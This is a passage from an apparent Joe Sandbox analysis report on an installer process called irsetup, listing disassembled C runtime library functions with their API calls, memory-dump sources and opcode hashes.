                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 8016435-0
                                                                                                                    • Opcode ID: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
                                                                                                                    • Instruction ID: d9f390f5e57b81c544825edcb0cf6f397babacc6c857381744f7d8a64d4c1da9
                                                                                                                    • Opcode Fuzzy Hash: 14118bda57a2b90261456a6f636c4c5c2698acb7dde5bf08f5e9b6b003f9f84d
                                                                                                                    • Instruction Fuzzy Hash: 87518F322047888AFBE79B2694417EE63A1F7A8BC5F54C015FE4947B86DF38CA0D8701
                                                                                                                    Function 000000018002ECF4 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _ctrlfp_set_statfp$_call_matherr_exception_enabled_raise_exc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 932658401-0
                                                                                                                    • Opcode ID: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
                                                                                                                    • Instruction ID: 8ea2834ca092981a7e33b9b2295afd33eedbb5ae56d736279697e7e8cc69432a
                                                                                                                    • Opcode Fuzzy Hash: ad416f46ac546154802dd70ae447ad76da288f2288ed4676cd6c838ef0a3701b
                                                                                                                    • Instruction Fuzzy Hash: 8D313D32608EC886D672DB15E4413EBB365FBCE394F154225FA8C5BB58DF39C5498B40
                                                                                                                    Function 000000018002F404 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F42D
                                                                                                                    • DecodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F43C
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4B9
                                                                                                                      • Part of subcall function 000000018002C04C: realloc.LIBCMT ref: 000000018002C077
                                                                                                                      • Part of subcall function 000000018002C04C: Sleep.KERNEL32(?,?,00000000,000000018002F4A9,?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002C093
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4C8
                                                                                                                    • EncodePointer.KERNEL32(?,?,?,000000018002F515,?,?,?,?,0000000180020922), ref: 000000018002F4D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1310268301-0
                                                                                                                    • Opcode ID: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
                                                                                                                    • Instruction ID: c9725b456daa9fdbd47dcba6a1973a2d1d59f8ec4ab8946eea0d685f15fedc00
                                                                                                                    • Opcode Fuzzy Hash: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
                                                                                                                    • Instruction Fuzzy Hash: D221D331301A4C81EAA3AF21E8457EBA391B34D7C0F44C835BA4D0778AEEB8C28CC341
                                                                                                                    Function 0000000180038EBC Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1445889803-0
                                                                                                                    • Opcode ID: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
                                                                                                                    • Instruction ID: 243d979cf980d91638068ba1cf51c6dd2d398df9d072928e8bbb030d2aa91185
                                                                                                                    • Opcode Fuzzy Hash: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
                                                                                                                    • Instruction Fuzzy Hash: FC015E31215A0886EBE28F21F9803966360F74DBD4F46A621FE5E477A4DF39CA9D8300
                                                                                                                    Function 00007FF68BB47EE4 Relevance: 7.5, APIs: 5, Instructions: 39timethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576963644.00007FF68B8E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68B8E0000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576910208.00007FF68B8E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577638468.00007FF68BD69000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577716635.00007FF68BD76000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577769794.00007FF68BD79000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577769794.00007FF68BD85000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577769794.00007FF68BD97000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577929974.00007FF68BD9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577985616.00007FF68BDBF000.00000010.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4578037036.00007FF68BDC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ff68b8e0000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1445889803-0
                                                                                                                    • Opcode ID: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
                                                                                                                    • Instruction ID: 892f41c59e14a90b1868d20cedad64db0f3a3e280163284b2d5719743edeb272
                                                                                                                    • Opcode Fuzzy Hash: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
                                                                                                                    • Instruction Fuzzy Hash: 7001A122669A46C1EB508F21EC402696370FF0DBA0F856638EE5E877B4DF7CD895C740
                                                                                                                    Function 00000001800324A8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getbuf
                                                                                                                    • String ID: %.14g
                                                                                                                    • API String ID: 606515832-3267037135
                                                                                                                    • Opcode ID: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
                                                                                                                    • Instruction ID: d7cf500bb31369f41dd2bf305ad7167dfc6d28a841a02d62a1bb6ec0d038c543
                                                                                                                    • Opcode Fuzzy Hash: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
                                                                                                                    • Instruction Fuzzy Hash: 5A41C272600B4886EBAB9F28D4513AE37A0E78CFD4F168215FA6A473D6DF34CA55C740
                                                                                                                    Function 000000018000E020 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: FILE*$attempt to use a closed file$cur
                                                                                                                    • API String ID: 2918714741-2248676531
                                                                                                                    • Opcode ID: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
                                                                                                                    • Instruction ID: 6c949a32b7c445aad4823cac95b0331f89fcc6844e5a922ae23727c4ae02fac2
                                                                                                                    • Opcode Fuzzy Hash: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
                                                                                                                    • Instruction Fuzzy Hash: CB216F71705A4881FB92EB52E5913EA6365E78DBC0F45C022FE4917B9ACE38C74E8740
                                                                                                                    Function 000000018000E2E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errnofflush
                                                                                                                    • String ID: FILE*$attempt to use a closed file
                                                                                                                    • API String ID: 748766958-999929173
                                                                                                                    • Opcode ID: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
                                                                                                                    • Instruction ID: effcfa852fb6302185ee5319f9c93b9d90322d014ae9de1df5db582a5132b004
                                                                                                                    • Opcode Fuzzy Hash: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
                                                                                                                    • Instruction Fuzzy Hash: F7117C31704A8881FB82EB52E1913EA6361A789BC0F448022BE0917B9ACE6CC6898740
                                                                                                                    Function 000000018002E4E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _getptd_lockfree
                                                                                                                    • String ID: %.14g
                                                                                                                    • API String ID: 3892346632-3267037135
                                                                                                                    • Opcode ID: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
                                                                                                                    • Instruction ID: 4a9433009a0817146d8213779e3cdba636acc00540cdeb6e6f7f8c89661ab616
                                                                                                                    • Opcode Fuzzy Hash: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
                                                                                                                    • Instruction Fuzzy Hash: A8115E31261B8882EAD79B50E4807E873A0F78DBC8F498125FA1D03791DF34CA5DC701
                                                                                                                    Function 00000001800207F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 00000001800207FF
                                                                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 0000000180020814
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                    • Opcode ID: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
                                                                                                                    • Instruction ID: 8eca91b44297037b0ac9d1d6b010f20b8df3b1a68d07564286341e8c3e27f513
                                                                                                                    • Opcode Fuzzy Hash: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
                                                                                                                    • Instruction Fuzzy Hash: D7E01234B11B0851FE9B5F91A8E43A51390AB4C780F499829985E06391DF68878D8394
                                                                                                                    Function 0000000180028C50 Relevance: 6.4, APIs: 5, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    • free.LIBCMT ref: 0000000180028D99
                                                                                                                    • free.LIBCMT ref: 0000000180028DB5
                                                                                                                      • Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
                                                                                                                      • Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
                                                                                                                      • Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
                                                                                                                      • Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
                                                                                                                      • Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
                                                                                                                      • Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
                                                                                                                      • Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
                                                                                                                      • Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A
                                                                                                                    • free.LIBCMT ref: 0000000180028DCA
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    • free.LIBCMT ref: 0000000180028DE9
                                                                                                                    • free.LIBCMT ref: 0000000180028E05
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentSleepTerminateUnwindVirtualmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1498969394-0
                                                                                                                    • Opcode ID: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
                                                                                                                    • Instruction ID: e4a9b29ca778be11defb2c39dc2281dcbbc2f6ed8a753c597f6380265792a982
                                                                                                                    • Opcode Fuzzy Hash: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
                                                                                                                    • Instruction Fuzzy Hash: 1D517236201E4886EBA39F25E8403DD3355F788BD8F598026FE8D47795DE38CA8AC344
                                                                                                                    Function 0000000180029078 Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3186804695-0
                                                                                                                    • Opcode ID: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
                                                                                                                    • Instruction ID: 8693baa525cc390d4e04389ed9084d09a48d9bf4543c762d9cd6e86b7275e954
                                                                                                                    • Opcode Fuzzy Hash: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
                                                                                                                    • Instruction Fuzzy Hash: 5281B072205B8996EBA6DF65E1847DE73A0F3487C4F508126EB8D43B94DF38D258CB00
                                                                                                                    Function 0000000180039880 Relevance: 6.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection_lock$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2641352136-0
                                                                                                                    • Opcode ID: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
                                                                                                                    • Instruction ID: f39b5f0a46982969517bee665c5b07b8d69fc09acf0904b0d854b37e53922783
                                                                                                                    • Opcode Fuzzy Hash: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
                                                                                                                    • Instruction Fuzzy Hash: 9D510932201B8886EB93CF55E4403AA7791F7987E8F46C216FA5A067E5CF78C619C701
                                                                                                                    Function 00000001800295A4 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4201827665-0
                                                                                                                    • Opcode ID: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
                                                                                                                    • Instruction ID: 460a503547ebc5d843fb0f47162114160bb622de7595eaa0c997af710718bdb1
                                                                                                                    • Opcode Fuzzy Hash: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
                                                                                                                    • Instruction Fuzzy Hash: D151AC31602A8886F7D7EB25E884BEA2391FB4D7C8F11C525FE5A43792DE78C6498704
                                                                                                                    Function 000000018002C178 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDeleteSection$Freefree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1250194111-0
                                                                                                                    • Opcode ID: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
                                                                                                                    • Instruction ID: 70892d1e86e0fe61b579319fcbecef8552250517042c71bfe73d972997a8cc6e
                                                                                                                    • Opcode Fuzzy Hash: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
                                                                                                                    • Instruction Fuzzy Hash: 51119E31605A4CD6FBA78B11E9503A97360E70DBE4F588212FA5502B95CF68CAA9C701
                                                                                                                    Function 000000018001E96C Relevance: 6.0, APIs: 4, Instructions: 42COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer_errno_flush_freebuf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889905870-0
                                                                                                                    • Opcode ID: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
                                                                                                                    • Instruction ID: 21c6b32f25e86580c02bfc281b2be964b159bf8c721c44a871fe3adfba9ac30f
                                                                                                                    • Opcode Fuzzy Hash: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
                                                                                                                    • Instruction Fuzzy Hash: 6801D432614A8842FFE7EA7598123FD12516B9E7E8F29C322BA15871D2CE38C6088301
                                                                                                                    Function 000000018003972C Relevance: 6.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
